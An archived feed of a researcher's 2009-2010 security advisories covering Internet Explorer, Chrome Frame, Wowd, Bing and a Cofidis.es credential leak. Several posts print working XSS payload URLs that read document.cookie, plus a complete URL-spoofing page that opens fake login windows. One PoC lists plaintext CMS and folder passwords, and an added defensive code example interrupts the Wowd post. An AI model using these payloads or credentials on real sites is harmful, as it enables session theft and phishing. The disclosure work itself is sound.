</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-23631335555038559282010-01-21T10:17:00.008-08:002010-01-24T03:08:14.698-08:00Internet explorer 6 7 8 URL Validation Vulnerability###################################<br />
Internet Explorer 6, 7 and 8 URL Validation Vulnerability<br />
Vendor: http://www.Microsoft.com<br />
Vendor notified: YES   Vendor confirmed: YES<br />
Ref. bulletin: <a href="http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx" target="_blank">MS10-002</a><br />
#########################################<br />
<br />
A remote code execution vulnerability exists in the way that Internet Explorer incorrectly validates input. An attacker could exploit the vulnerability by constructing a specially crafted URL. When a user clicks the URL, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.<br />
<br />
To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see <a href="http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx" target="_blank">MS10-002</a> and CVE-2010-0027.<br />
<br />
No more details at this time. I have a PoC, but at this moment it is private.<br />
<br />
Timeline for this vulnerability:<br />
<br />
Discovered: 05-11-2009<br />
Reported to vendor: 15-11-2009<br />
Vendor response: 15-11-2009<br />
Vendor accepts in case manager: 19-11-2009<br />
Vendor patch: 21-01-2010<br />
<br />
#################€nd#############<br />
<br />
Thanks to Estrella for being my light<br />
Thanks to icar0 & sha0 from Badchecksum<br />
Thanks to the Google Security Team for their support<br />
Thanks to MSRC for their support<br />
<br />
Sincerely,<br />
Security Research & Analysis.<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-61647242483443909592009-11-19T04:04:00.005-08:002009-11-19T04:20:52.636-08:00Google Chrome Frame null domain XSS#####################################<br />
Google Chrome Frame null domain XSS<br />
Vendor URL: http://www.google.com/chromeframe<br />
Vendor changelog: http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html<br />
Advisory: http://lostmon.blogspot.com/2009/11/google-chrome-frame-null-domain-xss.html<br />
Vendor notified: yes   Exploit available: YES<br />
######################################<br />
<br />
######################<br />
Description by vendor<br />
######################<br />
<br />
Google Chrome Frame is a free plug-in for Internet Explorer. Some advanced web apps, like Google Wave, use Google Chrome Frame to provide you with additional features and better performance.<br />
<br />
Google Chrome Frame is an early-stage open source plug-in that seamlessly brings Google Chrome's open web technologies and speedy JavaScript engine to Internet Explorer.<br />
<br />
################<br />
Version affected<br />
################<br />
<br />
4.0.223.9 (Official Build 29618)<br />
WebKit: 532.3<br />
V8: 1.3.16<br />
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3<br />
<br />
Not affected version:<br />
<br />
4.0.245.1 (Official Build 31970)<br />
WebKit: 532.5<br />
V8: 1.3.18.6<br />
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5<br />
<br />
You can find additional information here:<br />
http://googlechromereleases.blogspot.com/2009/11/google-chrome-frame-update-bug-fixes.html<br />
<br />
#####################<br />
Cross Site Scripting<br />
#####################<br />
<br />
Create an HTML document and try the following:<br />
<br />
<iframe src="javascript:alert(1)"></iframe><br />
=> this opens the iframe and executes the alert (this is correct)<br />
<br />
<iframe src="cf:javascript:alert(1)"></iframe><br />
=> this does not work; the alert is not shown (correct)<br />
<br />
And here is the flaw =><br />
<iframe src="cf:view-source:javascript:alert(1)"></iframe><br />
<br />
This shows and executes the alert. It works in local and remote scenarios,<br />
and via the address bar too.<br />
This bypasses cross-origin protections!!!<br />
<br />
For the Google Chrome browser, test this in the address bar =><br />
view-source:javascript:alert(1)<br />
<br />
This executes the alert, but Google has recently made changes to the about:blank page and this issue is only exploitable via the address bar, not from an iframe, a frame or an HTML document, so I think this issue is not exploitable in a remote scenario.<br />
<br />
###########<br />
Crashes<br />
###########<br />
<br />
cf:view-source:about@: => crash<br />
cf:about@: => crashes the tab<br />
<br />
##########<br />
Solution<br />
############<br />
<br />
Google has automatically released a new version of Chrome Frame,<br />
4.0.245.1 (Official Build 31970), and this version is not affected.<br />
<br />
#################€nd#############<br />
<br />
Thanks to Estrella for being my light<br />
Thanks to icar0 & sha0 from Badchecksum<br />
Thanks to the Google Security Team<br />
<br />
Sincerely,<br />
Security Research & Analysis.<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
Curiosity is what moves the mind....<div class="blogger-post-footer">
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1965417791411566522009-10-27T11:39:00.004-07:002009-11-03T01:45:32.930-08:00Wowd search client multiple variable xss##########################################<br />
Wowd search client multiple variable XSS<br />
Vendor URL: http://www.wowd.com/<br />
Advisory: http://lostmon.blogspot.com/2009/10/wowd-search-client-multiple-variable.html<br />
Vendor notified: yes Exploit available: yes<br />
##########################################<br />
<br />
################<br />
What is Wowd?<br />
################<br />
<br />
Wowd is a real-time search engine for discovering<br />
what's popular on the web right now.<br />
<br />
In essence, the company has made a peer-to-peer<br />
search engine powered by what other Wowd users<br />
are looking at online, rather than studying and<br />
ranking sites based on an arcane link structure.<br />
Taking search and breaking it into millions of<br />
tiny pieces, all run by individual users who have<br />
downloaded the Wowd client, completely changes<br />
the operation -- and economics -- of a search<br />
engine. The more times that someone in the Wowd<br />
crowd clicks on a link within a recent time<br />
frame, the higher the link's ranking.<br />
<br />
<br />
##########################<br />
Vulnerability description<br />
##########################<br />
<br />
The Wowd client contains a flaw that allows a remote<br />
cross-site scripting attack. This flaw exists because<br />
the application does not validate the 'sortby', 'tags' and 'ctx'<br />
variables in the URI upon submission to the<br />
'index.html' script. This could allow a user to create<br />
a specially crafted URL that would execute arbitrary<br />
code in a user's browser within the trust relationship<br />
between the browser and the server, leading to a loss of integrity.<br />
<br />
This issue can be dangerous, because if you are running the<br />
Wowd client you have all of these vulnerabilities, and<br />
this issue can be exploited across all browsers,<br />
including IE8 with the XSS filter (WoW!)<br />
<br />
#################<br />
Versions<br />
#################<br />
<br />
Wowd client 1.3.0: vulnerable<br />
Wowd client 1.3.1: not vulnerable<br />
<br />
<br />
#################<br />
SOLUTION<br />
#################<br />
<br />
Upgrade to version 1.3.1 or higher, as it has been<br />
reported to fix this vulnerability. An upgrade is<br />
required as there are no known workarounds.<br />
<br />
<br />
###################<br />
Proof of Concept<br />
###################<br />
<br />
#############<br />
Test<br />
#############<br />
<br />
I tested it in IE8, Firefox 3.5.3 and Safari 4.<br />
<br />
In all cases the XSS is executed, including IE8 with the XSS filter :D<br />
<br />
A remote user can compose an HTML document<br />
with an iframe and this source for the iframe:<br />
<br />
http://localhost:8101/wowd/index.html?search&sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E<br />
<br />
The browser executes the XSS; if you access this URL directly,<br />
the XSS is executed too.<br />
<br />
Additionally, when Wowd shows its results, there is a function<br />
to add "tags" to a URL.<br />
<br />
Example:<br />
<br />
http://localhost:8101/wowd/index.html?search&query=a&sortby=rank&tags=english|S0B0707656E676C6973680D02<br />
<br />
This shows an indexed search with the tag 'english'. We can add a<br />
crafted tag, of the form [tag]|[token], that allows executing an XSS.<br />
<br />
Example:<br />
<br />
http://localhost:8101/wowd/index.html?search&query=a&sortby=rank&tags=english|S0B0707656E676C6973680D02,%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02<br />
<br />
This executes the XSS in the tag labels.<br />
<br />
The ctx variable is also affected:<br />
<br />
http://localhost:8101/wowd/index.html?search&page=2&q=&sortby=rank&tags=news|S0807046E6577730D02&ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E<br />
<br />
<br />
############## €nd ###################<br />
<br />
Thnx To estrella for being my light<br />
Thnx to all Lostmon Team !<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<br />
----------------------------------------------<br />
Browser: Internet Explorer 8 (Windows)<br />
Browser: Firefox 3.5 (Windows)<br />
Browser: Safari 4 (Windows)<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
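The 'sortby' and 'tags' handling described in this advisory, as an added example (not code from the advisory or from the Wowd client): a small Node.js model that validates the enumerated sortby value against an allow-list and parses the [tag]|[token] list, HTML-encoding every label before it reaches the results page. The token shape (one letter followed by hex digits) and the label length limit are assumptions taken from the sample values in the post.

```javascript
// Added example, not part of the Wowd client or this advisory.
// Models the two reflected parameters from the post:
//   sortby : an enumerated value ("rank" is the only one seen here)
//   tags   : comma-separated "label|token" pairs, e.g.
//            english|S0B0707656E676C6973680D02
// Both were reflected into index.html without validation or encoding.

// Sample input constructed from the URLs in the post (URL-decoded form).
const SAMPLE_TAGS =
  'english|S0B0707656E676C6973680D02,' +
  '"><script>alert(document.cookie)</script>|S0B0707656E676C6973680D02';
const SAMPLE_SORTBY = 'rank"><script>alert(document.cookie)</script>';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for element content or a double-quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed token shape, generalised from the sample values: one letter, then hex digits.
const TOKEN_RE = /^[A-Z][0-9A-F]+$/;
// Assumed allow-list for the enumerated sort parameter ("rank" is the only value on the page).
const SORT_KEYS = new Set(['rank']);
// Assumed policy limit for free-text labels.
const MAX_LABEL_LENGTH = 64;

// Enumerated parameters are checked against an allow-list; anything else
// falls back to the default instead of being reflected.
function validateSortBy(raw) {
  return SORT_KEYS.has(raw) ? raw : 'rank';
}

// Split the tags parameter into {label, token} objects. Entries whose token
// does not match the expected shape, or whose label is empty or over-long,
// are dropped. Labels are kept as-is here; encoding happens at render time.
function parseTags(rawTags) {
  const tags = [];
  for (const entry of rawTags.split(',')) {
    const sep = entry.lastIndexOf('|');
    if (sep < 0) continue;
    const label = entry.slice(0, sep);
    const token = entry.slice(sep + 1);
    if (!TOKEN_RE.test(token)) continue;
    if (label.length === 0 || label.length > MAX_LABEL_LENGTH) continue;
    tags.push({ label, token });
  }
  return tags;
}

// The pattern the post describes: the raw label is concatenated into markup,
// so a label of  "><script>...  breaks out of the attribute.
function renderTagsUnsafe(rawTags) {
  return rawTags
    .split(',')
    .map((entry) => `<a class="tag" href="?tags=${entry}">${entry.split('|')[0]}</a>`)
    .join('');
}

// Hardened rendering: parsed and validated input, URL-encoded inside the
// href, HTML-encoded everywhere it lands in the document.
function renderTagsSafe(rawTags) {
  return parseTags(rawTags)
    .map(({ label, token }) => {
      const href = '?tags=' + encodeURIComponent(`${label}|${token}`);
      return `<a class="tag" href="${escapeHtml(href)}">${escapeHtml(label)}</a>`;
    })
    .join('');
}

console.log('sortby ->', validateSortBy(SAMPLE_SORTBY));
console.log('unsafe ->', renderTagsUnsafe(SAMPLE_TAGS));
console.log('safe   ->', renderTagsSafe(SAMPLE_TAGS));
```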
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-77505770935017193022009-10-15T11:33:00.008-07:002010-02-13T11:11:46.310-08:00Cofidis.es may have had its data compromised###########################################<br />
Cofidis.es may have had its data compromised<br />
Vendor: www.cofidis.es<br />
Flaw: critical credentials exposed<br />
Updated: 13-02-2010<br />
###########################################<br />
<br />
Cofidis is a company made up of several credit groups that<br />
bring together different services within the global finance<br />
landscape.<br />
<br />
Their description, as we can read on their website:<br />
"We are the European leaders in credit by telephone:<br />
we have more than 8 million customers. In Spain, we already<br />
have more than 15 years of experience and a team<br />
of more than 800 employees."<br />
<br />
Cofidis.es may have been affected by a flaw through which<br />
third parties could have gained access to personal data,<br />
since the root access credentials for the portal were left<br />
exposed, and likewise the access credentials for the portal's<br />
database were left exposed.<br />
<br />
To get an idea of what kind of data may have been seen or<br />
"stolen" by third parties, we only need to look at one of the<br />
credit application forms; from the data requested there we can<br />
tell what kind of data the database could contain.<br />
https://www.espaciocliente.cofidis.es/cofidis/preapprove/PreApproveContractDisplayAction.do<br />
<br />
This news reached me after seeing a post on Twitter which<br />
gave a URL on the Cofidis.es portal pointing to a txt file<br />
without any kind of protection, which contained the<br />
credentials mentioned above.<br />
<br />
After observing this situation, and talking with some of the<br />
members of the discussion and research group, we decided to<br />
look into how long this situation could have existed and the<br />
possible origin of the news, doing a quick search in<br />
the usual search engines.<br />
##################<br />
Update<br />
##################<br />
<br />
Apparently the first news about<br />
this situation could be this post<br />
on a blog which discusses the matter<br />
without actually revealing the direct addresses.<br />
The Twitter posts could have taken the<br />
information for their posts from it.<br />
<br />
The post is dated 11-10-2009<br />
<br />
http://86400.es/2009/10/11/la-seguridad-de-los-que-manejan-nuestro-dinero/<br />
<br />
#################################<br />
<br />
We arrived at a Twitter post dated 12-10-2009.<br />
<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/twitter_dia_12.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/twitter_dia_12.gif" height="250" width="400"></center></a><br />
And a later one dated 13-10-2009.<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/twitter_dia_13.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/twitter_dia_13.gif" height="250" width="400"></center></a><br />
And another one on 13-10-2009<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_twitter.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_twitter.gif" height="250" width="400"></center></a><br />
<br />
On the afternoon of 14-10-2009 the txt file containing these<br />
credentials was removed from the root of the cofidis.es portal,<br />
so it can be assumed that such sensitive data may have been<br />
within everyone's reach for at least three days.<br />
<br />
Google shows in its cache a snapshot of that document<br />
dated 13-10-2009, showing the credentials<br />
<br />
http://209.85.229.132/search?q=cache:nrpZAY7spqYJ:www.cofidis.es/xxxxx.txt+http://www.cofidis.es/xxxx.txt&cd=8&hl=es&ct=clnk&gl=es<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_google.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_google.gif" height="250" width="400"></center></a><br />
<br />
But this would be the date on which Google took that snapshot<br />
of the document, possibly replacing an earlier one.<br />
The Cofidis server logs should show when Google's spider<br />
was first able to crawl that txt file.<br />
<br />
Likewise, if we search Google for the txt file, among the<br />
first results it can be seen that Google also reveals those<br />
credentials. It remains to be known when that file was included<br />
in the index, in order to work out from what date this<br />
situation could have existed.<br />
<br />
http://www.google.es/search?q=cofidis.txt<br />
<a href="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_google_search.gif" target="_blank"><center><img src="http://usuarios.lycos.es/reyfuss/xss/images/cofidis/cofidis_google_search.gif" height="250" width="400"></center></a><br />
<br />
How could an administrator deliberately leave a file<br />
with such sensitive information in plain view of any visitor,<br />
more than one person will ask.<br />
<br />
Most likely the admin knew nothing about the existence of that<br />
file (or so we believe, or want to believe). It must have been a hack:<br />
judging by the type of file generated, its placement and the data<br />
it contains, it could have been some security hole in<br />
the website through which the attacker was able to<br />
include an external file<br />
(this vulnerability is known as RFI, or remote file include),<br />
since there are some scripts circulating on the net that<br />
do exactly that, and looking at their source one can see that<br />
they pull precisely this data from the machine or inject a<br />
PHP shell.<br />
<br />
I think Cofidis should explain this incident, and it should<br />
also be examined how this event affects Cofidis under the<br />
<a href="https://www.agpd.es/portalweb/index-ides-idphp.php">LOPD</a><br />
and which data have been compromised; not on my account, because<br />
fortunately I am not in their database as far as I know, since<br />
I never needed their services.<br />
<br />
From the Lostmon's Groups research and development group<br />
we want to call on companies like Cofidis and others that<br />
work with such sensitive and confidential personal data<br />
to invest part of their profits in ensuring that such<br />
data will not be accessible, and to do everything possible<br />
to protect it as required by the<br />
<a href="https://www.agpd.es/portalweb/index-ides-idphp.php">LOPD</a>.<br />
<br />
It is true that in security nothing is secure, or that<br />
the beauty of security is the insecurity it brings with<br />
it. And it is also true that however much emphasis and<br />
effort administrators put into securing services and systems,<br />
there are always people who are one step ahead of them.<br />
<br />
This analysis was carried out by <a href="http://climbo.wordpress.com" target="_blank">Climbo</a> and by Lostmon<br />
<br />
Thanks to all Lostmon groups team<br />
Thnx to estrella for being my light<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-77858879051460727722009-09-16T06:52:00.006-07:002009-09-16T08:26:43.452-07:00IE8 Save as Title BugIE8 has a bug that denies access to the<br />
"Save as" function if an HTML document has a very<br />
long title.<br />
<br />
By default, when a user clicks on "Save as",<br />
the browser uses the HTML title as the file name to<br />
save; but if this title is very long, Explorer gives<br />
an error because it can't save the file.<br />
<br />
Explorer can't save files with a title longer<br />
than 261 characters; Explorer then gives a warning<br />
with an error that the file can't be saved.<br />
<br />
I think that this has no security implication,<br />
and I sent it to MSRC and they think the same.<br />
<br />
MSRC Response:<br />
<br />
"agree with your assessment that this does not appear to<br />
be a security issue. It may be a bug though so I am going<br />
to forward your information directly to the product team<br />
for considerations in a future non-security update"<br />
<br />
<br />
A simple PoC of this situation:<br />
<br />
<HTML><br />
<TITLE>A*261 chars</TITLE><br />
</HTML><br />
<br />
###########End #################<br />
<br />
Thanks to all Lostmon groups team<br />
Thnx to estrella for being my light<br />
<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-5668847880297842222009-09-01T05:58:00.005-07:002009-10-15T05:03:41.147-07:00Security Researcher Acknowledgments from Microsoft<div style="text-align: center;"><b>Security Researcher Acknowledgments </b></div><div><div style="text-align: center;"><b>for Microsoft Online Services</b></div><div><br /><div style="text-align: justify;">The Microsoft Security Response Center (MSRC) is pleased to recognize the security researchers who have helped make Microsoft online services safer by finding and reporting security vulnerabilities. Each name listed represents an individual or company who has responsibly disclosed one or more security vulnerabilities in our online services and worked with us to remediate the issue.</div><a href="http://technet.microsoft.com/en-us/security/cc308575.aspx#0809">http://technet.microsoft.com/en-us/security/cc308575.aspx#0809</a><br /><br /></div><div>August 2009 Security Researchers<br /><br /><ul><li><b>Lostmon Lords<br />lostmon.blogspot.com</b></li><li>Knuchel Steven<br />xylitol.free.fr</li><li>Nenad Vijatov<br />blog.vijatov.com</li></ul><br /></div><div>--</div><div><br /></div><div>Thanks to all Lostmon groups team</div><div>Thnx to estrella for being my light</div><div><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: <a href="http://lostmon.blogspot.com/">http://lostmon.blogspot.com/</a><br />Google group: <a href="http://groups.google.com/group/lostmon">http://groups.google.com/group/lostmon</a> (new)<br />--<br />La curiosidad es lo que hace mover la mente....<br /></div></div><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-12268926942984176742009-08-15T09:54:00.010-07:002010-04-18T08:19:48.117-07:00Multiple Browsers Fake url folder & file Same origin Spoof#########################################<br />
Multiple Browsers Fake url folder & file Same origin Spoof <br />
Original Article: http://lostmon.blogspot.com/2009/08/multiple-browsers-fake-url-folder-file.html<br />
##########################################<br />
<br />
##############<br />
Abstract<br />
##############<br />
<br />
A user opens his browser and tries to navigate to<br />
http://www.host.com/admin/admin.php. This URL is on<br />
the remote server and, if the user has privileges,<br />
he can access the file admin.php.<br />
<br />
If the file admin.php is not on the server,<br />
the user gets a 404 HTTP error from the server.<br />
<br />
If the user tries to browse http://www.host.com/admin/<br />
and this path is not on the server, the user again gets a 404<br />
HTTP error.<br />
<br />
If the user presses the refresh button, the page reloads its content,<br />
and if the user presses Ctrl+F5 the browser refreshes all content of<br />
the page.<br />
<br />
Sometimes HTTP errors such as 404, 403, etc. are handled<br />
by a third-party app, a toolbar, or by predefined<br />
dynamic content built inside the browser.<br />
<br />
#######################<br />
Explanation<br />
#######################<br />
<br />
Multiple browsers have a flaw in this request/response handling<br />
that allows an attacker to spoof the URL, or spoof the content<br />
of a non-existent file or path, or spoof the URL and content<br />
of a trusted file or path.<br />
<br />
An attacker can also "trap" the browser in the spoofed page:<br />
when the user presses F5 or the refresh button, the page shows<br />
the spoofed content, and if the user presses Ctrl+F5 the page<br />
still shows the spoofed content. Only in the Opera browser does this last<br />
issue not work.<br />
<br />
<br />
##################<br />
Testing<br />
##################<br />
<br />
I tested it on Windows XP Home SP3, fully patched.<br />
For testing, let's write a script like:<br />
<br />
####################<br />
SOURCE CODE OF POC<br />
####################<br />
online PoC => http://cmspatch.200u.com/urlspoof.html<br />
<blockquote><pre><html>
<head>
<title>Multiple Browsers Fake url folder & file Same Origin Spoof</title>
</head>
<body>
<center>
<h1>Multiple Browsers Fake url folder & file Same origin Spoof By Lostmon</h1>
</center>
<p>
<a href='modules/profile/admin/admin.php' target='_blank'><h2>real path</h2></a>
<a href='javascript:spoofolder()'><h2>spoof a url folder !!</h2></a> Non-existent path
<a href='javascript:spoofile()'><h2>spoof a url file !!</h2></a> This file exists on the server.
<a href='javascript:spoofauth()'><h2>spoof a url with auth basic !!</h2></a><br>Only exists protected and has a password.
</p>
<p>
<strong>Password for the CMS: user Dismark, pass souaktendio.</strong><br>
<strong>Password for the protected folder: user terrapro, pass mayoristas.</strong>
</p>
<script>
// Each function opens a new window on a relative URL (a non-existent
// path, an existing file, or a basic-auth protected file) and writes
// fake content into it before any response arrives. The alert runs in
// the new window and shows the opener's real document.location.
function spoofolder()
{
var a = window.open('modules/login');
a.document.write('<H1>FAKE LOGIN PAGE</H1>');
a.document.write('<title>FAKE LOGIN PAGE</title>');
a.alert(document.location);
a.stop();
}
function spoofile()
{
var a = window.open('modules/system/admin.php');
a.document.write('<H1>FAKE LOGIN PAGE</H1>');
a.document.write('<title>FAKE LOGIN PAGE</title>');
a.alert(document.location);
a.stop();
}
function spoofauth()
{
var a = window.open('protected/admin/admin.php');
a.document.write('<H1>FAKE LOGIN PAGE</H1>');
a.document.write('<title>FAKE LOGIN PAGE</title>');
a.alert(document.location);
a.stop();
}
</script>
</body></html>
</pre></blockquote><br />
######## END SOURCE #####<br />
<br />
Save it as c:/test/urlspoof.html, for example.<br />
I use an alert to show the real window.location.<br />
For testing I opened the file using the file:/// protocol handler,<br />
and for the remote test I uploaded the file to a server:<br />
to an Apache on Windows 2003 and to an Apache on Linux Red Hat.<br />
<br />
server windows:<br />
Windows Server 2003 <br />
Apache/2.2.8 Win32 <br />
PHP/5.2.6<br />
Server at ***********.com<br />
<br />
server linux:<br />
<br />
Apache/2.2.11 (Unix) mod_ssl/2.2.11 <br />
OpenSSL/0.9.8e-fips-rhel5 <br />
mod_auth_passthrough/2.1<br />
FrontPage/5.0.2.2635 Server <br />
at ***********.com<br />
<br />
In all test cases the server sent the correct<br />
HTTP response.<br />
<br />
########################<br />
Locally affected Browsers<br />
########################<br />
<br />
For this test I used the file protocol handler and<br />
only tested the file spoof and the path spoof.<br />
<br />
1 - Firefox 3.5.1 and 3.5.2<br />
Open urlspoof via file c:/test/urlspoof.html and click<br />
on any spoof function; in all cases Firefox shows the spoofed<br />
URL and content. (Firefox 3.5.2 seems not vulnerable)<br />
<br />
2 - Lunascape 5.1.3 and 5.1.4 (switched to the Trident engine)<br />
Open urlspoof via file c:/test/urlspoof.html and click<br />
on any spoof function; in all cases Lunascape shows the<br />
spoofed URL and spoofed content.<br />
<br />
3 - Orca browser 1.2 build 2 seems not vulnerable, but when browsing the file<br />
the browser adds wyciwyg://4/ to the URL and executes the fake content.<br />
<br />
4 - Flock 2.5.1<br />
Open urlspoof via file c:/test/urlspoof.html and click<br />
on any spoof function; in all cases Flock shows the<br />
spoofed URL and spoofed content.<br />
<br />
5 - K-Meleon 1.5.3<br />
Open urlspoof via file c:/test/urlspoof.html and click<br />
on any spoof function; in all cases K-Meleon shows the<br />
spoofed URL and spoofed content.<br />
<br />
6 - SeaMonkey 1.1.17<br />
Open urlspoof via file c:/test/urlspoof.html and click<br />
on any spoof function; in all cases SeaMonkey shows the<br />
spoofed URL and spoofed content.<br />
<br />
7 - Avant browser 11.7 build 36<br />
Open urlspoof via file c:/test/urlspoof.html and click<br />
on any spoof function; in all cases Avant shows the<br />
spoofed URL and spoofed content.<br />
<br />
<br />
Google Chrome 2.0.172.39 (official build)<br />
writes in all three cases into about:blank.<br />
<br />
Internet Explorer 8 seems not vulnerable via the file: protocol<br />
<br />
<br />
########################<br />
Remotely affected Browsers<br />
########################<br />
<br />
For this test, upload the file to a server<br />
and browse to it via http://host.com/urlspoof.html<br />
<br />
1 - Internet Explorer 7 and 8<br />
Browse to the file and click on any link; in all<br />
three tests the browser shows the spoofed file, the spoofed path, and a "pseudo-bypass" of<br />
basic auth protection.<br />
<br />
2 - Avant browser 11.7 build 35 and build 36<br />
Browse to the file and click on any link; in all<br />
three tests the browser shows the spoofed file, the spoofed path, and a "pseudo-bypass" of<br />
basic auth protection.<br />
<br />
3 - Lunascape 5.1.3 and 5.1.4 (switched to the Trident engine)<br />
Browse to the file and click on any link; in all<br />
three tests the browser shows the spoofed file, the spoofed path, and a "pseudo-bypass" of<br />
basic auth protection.<br />
<br />
4 - Maxthon Browser 2.5.3.80 UNICODE<br />
Browse to the file and click on any link; in all<br />
three tests the browser shows the spoofed file, the spoofed path, and a "pseudo-bypass" of<br />
basic auth protection.<br />
<br />
Google Chrome writes in all cases into about:blank<br />
<br />
#################<br />
Trap issue<br />
#################<br />
<br />
In all affected browsers, when you are on the fake URL<br />
and try to reload or refresh the location via Ctrl+F5<br />
or F5 or similar, the browser does not show a 404 HTTP error;<br />
it continues showing the fake page at that location.<br />
This is very interesting, because an attacker can create a "ghost" file<br />
in a "ghost" path.<br />
In the case of the fake file, any web page on the server can be spoofed<br />
with the fake page, and when the user tries to reload or refresh,<br />
the browser shows the fake page, not the real page at that location.<br />
<br />
##################€nd ##################<br />
<br />
Thnx to cLimbo for spreading the word<br />
Thnx to estrella for being my light.<br />
Thnx to all Lostmon Groups Team.<br />
<br />
-- <br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-36115123082602014122009-08-13T12:41:00.004-07:002009-08-13T13:44:04.515-07:00Bing.com WebmasterAuthenticationInformationPage.aspx XSS###########################################<br />
Bing.com WebmasterAuthenticationInformationPage.aspx XSS<br />
Vendor URL: http://ww.bing.com<br />
Advisory: http://lostmon.blogspot.com/2009/08/bingcom-webmasterauthenticationinformat.html<br />
Vendor notified: yes Vendor confirmed: yes<br />
###########################################<br />
<br />
The Bing search engine contains a flaw that allows a remote cross-site<br />
scripting attack. This flaw exists because the application does not<br />
properly validate the 'authTag' variable upon submission to the<br />
'WebmasterAuthenticationInformationPage.aspx' script. This could<br />
allow a user to create a specially crafted URL that would execute<br />
arbitrary code in a user's browser within the trust relationship<br />
between the browser and the server, leading to a loss of integrity.<br />
<br />
<a href="http://www.spymac.com/upload/2009/08/13/OyQTAItMeV.gif" target="_blank"><center><img src="http://www.spymac.com/upload/2009/08/13/OyQTAItMeV.gif" height="250" width="400"></center></a><br />
An attacker can then compose a malformed link using the variable<br />
of WebmasterAuthenticationInformationPage.aspx and look at the<br />
resulting code: it is written into two boxes and into the file<br />
'LiveSearchSiteAuth.xml'.<br />
<br />
A remote user can compose a malformed link using the variable<br />
of WebmasterXMLAuthDownloadPage.aspx; when the file<br />
